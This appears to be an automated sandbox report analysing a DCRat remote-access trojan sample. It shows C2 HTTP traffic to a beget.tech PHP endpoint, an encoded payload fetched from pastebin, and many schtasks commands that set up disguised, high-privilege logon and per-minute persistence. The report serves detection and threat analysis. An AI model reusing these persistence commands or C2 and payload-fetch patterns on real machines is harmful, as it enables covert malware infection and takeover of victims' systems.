              Jul 27, 2024 11:37:32.382734060 CEST478OUTGET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1
              Accept: */*
              Content-Type: text/css
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
              Host: romangw5.beget.tech
              Connection: Keep-Alive
              Jul 27, 2024 11:37:33.129066944 CEST546INHTTP/1.1 200 OK
              Server: nginx-reuseport/1.21.1
              Date: Sat, 27 Jul 2024 09:37:32 GMT
              Content-Type: text/html
              Content-Length: 274
              Last-Modified: Mon, 17 Jun 2024 09:36:19 GMT
              Connection: keep-alive
              Keep-Alive: timeout=30
              ETag: "66700393-112"
              Accept-Ranges: bytes
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
              Jul 27, 2024 11:37:33.132074118 CEST454OUTGET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1
              Accept: */*
              Content-Type: text/css
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
              Host: romangw5.beget.tech
              Jul 27, 2024 11:37:33.359345913 CEST546INHTTP/1.1 200 OK
              Server: nginx-reuseport/1.21.1
              Date: Sat, 27 Jul 2024 09:37:33 GMT
              Content-Type: text/html
              Content-Length: 274
              Last-Modified: Mon, 17 Jun 2024 09:36:19 GMT
              Connection: keep-alive
              Keep-Alive: timeout=30
              ETag: "66700393-112"
              Accept-Ranges: bytes
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>


              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749704172.67.19.244431532C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              TimestampBytes transferredDirectionData
              2024-07-27 09:37:31 UTC219OUTGET /raw/i8wetBiv HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
              Host: pastebin.com
              Connection: Keep-Alive
              2024-07-27 09:37:32 UTC388INHTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:37:32 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 27 Jul 2024 09:37:32 GMT
              Server: cloudflare
              CF-RAY: 8a9ba6be0dbb7d06-EWR
              2024-07-27 09:37:32 UTC412INData Raw: 31 39 35 0d 0a 50 54 31 52 5a 6a 78 52 52 6b 42 48 66 43 70 65 4b 54 35 72 66 6a 77 73 58 6a 73 75 51 54 41 6c 62 30 35 65 49 7a 42 67 4a 43 78 73 4c 46 34 6a 50 47 42 2b 54 69 67 73 62 57 49 74 49 53 42 69 4a 69 34 6d 4a 53 6c 42 53 43 77 77 4c 57 31 66 4b 56 38 38 54 56 38 2b 4a 43 55 38 55 55 5a 41 52 33 77 71 58 69 6b 2b 61 33 34 38 4c 46 34 37 4c 6b 45 77 4a 57 39 4f 58 69 4d 77 59 43 51 73 62 43 78 65 49 7a 78 67 66 6b 34 6f 4c 47 31 69 4c 53 45 67 59 69 59 75 4a 69 55 70 51 55 67 73 4d 43 31 74 58 79 6c 66 66 6b 31 66 50 69 5a 6c 2e 3d 3d 51 66 69 67 69 49 36 49 79 4d 69 77 69 49 2b 4a 69 4f 69 4d 6c 49 73 49 43 49 69 6f 6a 49 79 49 43 4c 69 51 69 49 36 49 79 51 69 77 69 49 41 4a 69 4f 69 49 6c 49 73 49 69 4a 69 6f 6a 49 35 4a 43 4c 69 30 69 49 36
              Data Ascii: 195PT1RZjxRRkBHfCpeKT5rfjwsXjsuQTAlb05eIzBgJCxsLF4jPGB+TigsbWItISBiJi4mJSlBSCwwLW1fKV88TV8+JCU8UUZAR3wqXik+a348LF47LkEwJW9OXiMwYCQsbCxeIzxgfk4oLG1iLSEgYiYuJiUpQUgsMC1tXylffk1fPiZl.==QfigiI6IyMiwiI+JiOiMlIsICIiojIyICLiQiI6IyQiwiIAJiOiIlIsIiJiojI5JCLi0iI6
              2024-07-27 09:37:32 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:05:37:14
              Start date:27/07/2024
              Path:C:\Users\user\Desktop\QIKiV83Pkl.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\QIKiV83Pkl.exe"
              Imagebase:0x870000
              File size:2'777'219 bytes
              MD5 hash:2C00EBC767B339C3BAF6BCF3086EDF51
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:2
              Start time:05:37:14
              Start date:27/07/2024
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe"
              Imagebase:0x4f0000
              File size:147'456 bytes
              MD5 hash:FF00E0480075B095948000BDC66E81F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              General

              Target ID:3
              Start time:05:37:25
              Start date:27/07/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
              Imagebase:0x410000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:05:37:25
              Start date:27/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff75da10000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:5
              Start time:05:37:25
              Start date:27/07/2024
              Path:C:\brokermonitordhcp\portruntime.exe
              Wow64 process (32bit):false
              Commandline:"C:\brokermonitordhcp\portruntime.exe"
              Imagebase:0x570000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 88%, ReversingLabs
              • Detection: 68%, Virustotal, Browse
              Reputation:low
              Has exited:true

              General

              Target ID:6
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:7
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:8
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:9
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:10
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:11
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:12
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:13
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:14
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:16
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:18
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:19
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:20
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
              Imagebase:0xf50000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 88%, ReversingLabs
              • Detection: 68%, Virustotal, Browse
              Has exited:true

              General

              Target ID:21
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
              Imagebase:0x6e0000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true

              General

              Target ID:22
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:23
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:24
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:25
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:26
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:27
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:28
              Start time:05:37:28
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:29
              Start time:05:37:28
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:30
              Start time:05:37:28
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:31
              Start time:05:37:29
              Start date:27/07/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"
              Imagebase:0x7ff757e70000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:32
              Start time:05:37:29
              Start date:27/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff75da10000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:33
              Start time:05:37:29
              Start date:27/07/2024
              Path:C:\Windows\System32\w32tm.exe
              Wow64 process (32bit):false
              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              Imagebase:0x7ff7a0ab0000
              File size:108'032 bytes
              MD5 hash:81A82132737224D324A3E8DA993E2FB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:37
              Start time:05:37:36
              Start date:27/07/2024
              Path:C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe
              Wow64 process (32bit):false
              Commandline:"C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
              Imagebase:0x440000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 88%, ReversingLabs
              • Detection: 68%, Virustotal, Browse
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:9.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:9.3%
                Total number of Nodes:1488
                Total number of Limit Nodes:39
                execution_graph 22947 871385 82 API calls 3 library calls 24907 895780 QueryPerformanceFrequency QueryPerformanceCounter 24857 88a89d 78 API calls 24858 887090 114 API calls 24859 88cc90 70 API calls 24908 88a990 97 API calls 24909 889b90 GdipCloneImage GdipAlloc 23226 88d891 19 API calls ___delayLoadHelper2@8 24910 899b90 21 API calls 2 library calls 24911 892397 48 API calls 23228 88d997 23229 88d89b 23228->23229 23230 88df59 ___delayLoadHelper2@8 19 API calls 23229->23230 23230->23229 24861 87ea98 FreeLibrary 24862 8796a0 79 API calls 24913 89e9a0 51 API calls 24865 88e4a2 38 API calls 2 library calls 24867 8976bd 52 API calls 3 library calls 24868 8716b0 84 API calls 23250 8990b0 23258 89a56f 23250->23258 23254 8990cc 23255 8990d9 23254->23255 23266 8990e0 11 API calls 23254->23266 23257 8990c4 23267 89a458 23258->23267 23261 89a59f 23263 88ec4a _ValidateLocalCookies 5 API calls 23261->23263 23262 89a5ae TlsAlloc 23262->23261 23264 8990ba 23263->23264 23264->23257 23265 899029 20 API calls 2 library calls 23264->23265 23265->23254 23266->23257 23268 89a488 23267->23268 23269 89a484 23267->23269 23268->23261 23268->23262 23269->23268 23273 89a4a8 23269->23273 23274 89a4f4 23269->23274 23271 89a4b4 GetProcAddress 23272 89a4c4 __crt_fast_encode_pointer 23271->23272 23272->23268 23273->23268 23273->23271 23275 89a515 LoadLibraryExW 23274->23275 23279 89a50a 23274->23279 23276 89a54a 23275->23276 23277 89a532 GetLastError 23275->23277 23276->23279 23280 89a561 FreeLibrary 23276->23280 23277->23276 23278 89a53d LoadLibraryExW 23277->23278 23278->23276 23279->23269 23280->23279 23281 89a3b0 23282 89a3bb 23281->23282 23284 89a3e4 23282->23284 23285 89a3e0 23282->23285 23287 89a6ca 23282->23287 23294 89a410 DeleteCriticalSection 23284->23294 23288 89a458 _abort 5 API calls 23287->23288 23289 89a6f1 23288->23289 23290 89a70f InitializeCriticalSectionAndSpinCount 23289->23290 23291 89a6fa 23289->23291 23290->23291 23292 88ec4a _ValidateLocalCookies 5 API calls 23291->23292 23293 89a726 23292->23293 23293->23282 23294->23285 24869 891eb0 6 API calls 3 library calls 23296 8979b7 23307 89b290 23296->23307 23301 8979d4 23303 8984de _free 20 API calls 23301->23303 23304 897a09 23303->23304 23305 8979df 23306 8984de _free 20 API calls 23305->23306 23306->23301 23308 89b299 23307->23308 23309 8979c9 23307->23309 23324 89b188 23308->23324 23311 89b610 GetEnvironmentStringsW 23309->23311 23312 89b627 23311->23312 23322 89b67a 23311->23322 23315 89b62d WideCharToMultiByte 23312->23315 23313 8979ce 23313->23301 23323 897a0f 26 API calls 3 library calls 